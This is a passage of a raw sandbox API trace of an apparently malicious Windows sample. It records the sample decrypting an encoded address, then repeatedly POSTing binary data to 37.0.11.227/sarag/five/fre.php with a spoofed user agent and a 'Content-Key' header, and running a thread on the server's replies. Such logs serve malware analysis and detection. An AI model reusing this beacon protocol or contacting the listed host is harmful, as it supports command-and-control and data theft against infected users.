0x690000 [0210.195] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0210.196] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0210.196] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0210.196] GetProcessHeap () returned 0x690000 [0210.196] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0210.196] GetProcessHeap () returned 0x690000 [0210.197] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0210.197] send (s=0x4c8, buf=0x6ab500*, len=242, flags=0) returned 242 [0210.197] send (s=0x4c8, buf=0x6aba40*, len=159, flags=0) returned 159 [0210.197] GetProcessHeap () returned 0x690000 [0210.197] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0210.197] recv (in: s=0x4c8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0210.286] GetProcessHeap () returned 0x690000 [0210.286] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0210.288] GetProcessHeap () returned 0x690000 [0210.288] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0210.288] GetProcessHeap () returned 0x690000 [0210.289] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af500 | out: hHeap=0x690000) returned 1 [0210.289] GetProcessHeap () returned 0x690000 [0210.289] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0210.289] closesocket (s=0x4c8) returned 0 [0210.292] GetProcessHeap () returned 0x690000 [0210.292] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab400 | out: hHeap=0x690000) returned 1 [0210.292] GetProcessHeap () returned 0x690000 [0210.292] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0210.292] GetProcessHeap () returned 0x690000 [0210.292] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0210.292] GetProcessHeap () returned 0x690000 [0210.293] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0210.293] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xa8c) returned 0x4c8 [0210.295] Sleep (dwMilliseconds=0xea60) [0210.296] GetProcessHeap () returned 0x690000 [0210.296] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0210.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.298] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0210.307] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.307] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0210.315] GetProcessHeap () returned 0x690000 [0210.315] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0210.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.317] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0210.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.317] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0210.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.318] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.318] GetProcessHeap () returned 0x690000 [0210.319] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0210.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.320] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0210.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.321] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0210.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.322] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0210.322] GetProcessHeap () returned 0x690000 [0210.322] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0210.324] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.324] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0210.325] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.325] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0210.326] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.326] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0210.327] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.327] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0210.327] GetProcessHeap () returned 0x690000 [0210.327] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0210.327] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0210.335] GetProcessHeap () returned 0x690000 [0210.335] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0210.335] GetProcessHeap () returned 0x690000 [0210.336] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0210.336] GetProcessHeap () returned 0x690000 [0210.336] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0210.336] GetProcessHeap () returned 0x690000 [0210.336] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0210.337] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.337] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0210.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.348] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0210.357] GetProcessHeap () returned 0x690000 [0210.357] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0210.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.358] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0210.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.359] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0210.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.360] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.360] GetProcessHeap () returned 0x690000 [0210.360] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0210.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.361] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0210.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.362] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0210.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.363] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0210.364] GetProcessHeap () returned 0x690000 [0210.364] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0210.364] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.364] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0210.365] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.365] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0210.368] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.368] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0210.368] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.369] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0210.369] GetProcessHeap () returned 0x690000 [0210.369] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0210.369] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0210.369] GetProcessHeap () returned 0x690000 [0210.369] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0210.369] socket (af=2, type=1, protocol=6) returned 0x4cc [0210.369] connect (s=0x4cc, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0210.397] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0210.397] GetProcessHeap () returned 0x690000 [0210.397] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0210.397] GetProcessHeap () returned 0x690000 [0210.398] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0210.398] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0210.399] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0210.399] GetProcessHeap () returned 0x690000 [0210.399] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0040 [0210.399] GetProcessHeap () returned 0x690000 [0210.399] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0210.400] GetProcessHeap () returned 0x690000 [0210.400] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0210.400] GetProcessHeap () returned 0x690000 [0210.400] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0210.400] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0210.401] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0210.401] GetProcessHeap () returned 0x690000 [0210.401] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0210.401] GetProcessHeap () returned 0x690000 [0210.402] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0210.402] send (s=0x4cc, buf=0x6ab500*, len=242, flags=0) returned 242 [0210.403] send (s=0x4cc, buf=0x6aba40*, len=159, flags=0) returned 159 [0210.403] GetProcessHeap () returned 0x690000 [0210.403] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0210.403] recv (in: s=0x4cc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0210.496] GetProcessHeap () returned 0x690000 [0210.497] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0210.497] GetProcessHeap () returned 0x690000 [0210.497] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0210.497] GetProcessHeap () returned 0x690000 [0210.497] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0040 | out: hHeap=0x690000) returned 1 [0210.498] GetProcessHeap () returned 0x690000 [0210.498] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0210.500] closesocket (s=0x4cc) returned 0 [0210.501] GetProcessHeap () returned 0x690000 [0210.501] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0210.501] GetProcessHeap () returned 0x690000 [0210.502] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0210.502] GetProcessHeap () returned 0x690000 [0210.502] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0210.502] GetProcessHeap () returned 0x690000 [0210.502] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0210.503] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x3d4) returned 0x4cc [0210.505] Sleep (dwMilliseconds=0xea60) [0210.507] GetProcessHeap () returned 0x690000 [0210.507] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0210.508] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.509] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0210.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.521] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0210.530] GetProcessHeap () returned 0x690000 [0210.530] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0210.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.532] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0210.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.533] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0210.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.534] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.534] GetProcessHeap () returned 0x690000 [0210.535] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0210.536] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.536] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0210.543] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.543] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0210.544] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.544] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0210.545] GetProcessHeap () returned 0x690000 [0210.545] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0210.546] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.546] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0210.547] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.548] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0210.549] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.549] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0210.550] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.550] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0210.550] GetProcessHeap () returned 0x690000 [0210.551] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0210.551] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0210.551] GetProcessHeap () returned 0x690000 [0210.551] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0210.552] GetProcessHeap () returned 0x690000 [0210.552] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0210.552] GetProcessHeap () returned 0x690000 [0210.552] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0210.552] GetProcessHeap () returned 0x690000 [0210.552] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0210.553] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.554] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0210.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.559] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0210.564] GetProcessHeap () returned 0x690000 [0210.564] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0210.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.565] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0210.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.566] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0210.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.567] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0210.567] GetProcessHeap () returned 0x690000 [0210.568] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0210.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.569] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0210.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.570] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0210.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0210.571] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0210.571] GetProcessHeap () returned 0x690000 [0210.571] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0210.572] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.572] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0210.573] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.573] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0210.573] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.574] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0210.574] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.575] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0210.575] GetProcessHeap () returned 0x690000 [0210.575] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0210.575] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0210.575] GetProcessHeap () returned 0x690000 [0210.575] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0210.575] socket (af=2, type=1, protocol=6) returned 0x4d0 [0210.575] connect (s=0x4d0, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0210.606] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0210.606] GetProcessHeap () returned 0x690000 [0210.606] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0210.606] GetProcessHeap () returned 0x690000 [0210.606] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0210.607] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0210.608] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0210.608] GetProcessHeap () returned 0x690000 [0210.608] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0210.608] GetProcessHeap () returned 0x690000 [0210.609] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0210.610] GetProcessHeap () returned 0x690000 [0210.610] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0210.610] GetProcessHeap () returned 0x690000 [0210.610] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0210.611] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0210.612] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0210.612] GetProcessHeap () returned 0x690000 [0210.612] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0210.613] GetProcessHeap () returned 0x690000 [0210.613] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0210.613] send (s=0x4d0, buf=0x6ad508*, len=242, flags=0) returned 242 [0210.614] send (s=0x4d0, buf=0x6aba40*, len=159, flags=0) returned 159 [0210.614] GetProcessHeap () returned 0x690000 [0210.614] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0210.614] recv (in: s=0x4d0, buf=0x6b2fb8, len=4048, flags=0 